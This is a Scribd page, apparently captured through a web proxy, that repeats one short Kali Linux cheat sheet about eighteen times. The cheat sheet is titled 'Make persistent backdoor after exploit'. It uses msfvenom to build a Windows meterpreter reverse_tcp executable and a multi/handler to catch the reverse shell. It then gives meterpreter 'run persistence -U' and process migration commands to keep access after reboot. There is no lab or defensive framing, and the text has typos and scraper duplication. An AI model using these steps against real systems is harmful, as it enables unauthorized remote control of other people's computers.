0% found this document useful (0 votes)
188 views18 pages

Makes Persistent Backdoor After Exploit in Kali Linux

The document outlines steps to create a persistent meterpreter backdoor on a Windows system after exploiting it from Kali Linux. It involves using msfvenom to generate an executable, starting Apache and PostgreSQL services, using msfconsole to set up a multi/handler, running persistence commands on the meterpreter session, and migrating to another process ID.

Uploaded by

signup101
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
188 views18 pages

Makes Persistent Backdoor After Exploit in Kali Linux

The document outlines steps to create a persistent meterpreter backdoor on a Windows system after exploiting it from Kali Linux. It involves using msfvenom to generate an executable, starting Apache and PostgreSQL services, using msfconsole to set up a multi/handler, running persistence commands on the meterpreter session, and migrating to another process ID.

Uploaded by

signup101
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 18

Make persistent backdoor after exploit in kali linux

root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp


root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options


root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>


Make persistent backdoor after exploit in kali linux
root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options


root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe
-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h


meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start


root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system


msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

Make persistent backdoor after exploit in kali linux


root@kali~#: msfvenom –p windows/meterpreter/reverse_tcp lhost=<you ip> lport <your port> -f exe

-a x86 –o <filename>

root@kali~#: service apache2 start

root@kali~#: service portgresql start

root@kali~#: msfconsole

root@kali~#: use multi/handler

root@kali~#: set payload windows/metepreter/reverse_tcp

root@kali~#: set lhost <your ip>

root@kali~#: show options

root@kali~#: run

meterpreter > run persistence –h

meterpreter > run persistence –U

target automatic reboot the system

msf exploit(handler) > exploit

metepreter > sysinfo

metepreter > ps

meterpreter > migrate <pid>

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy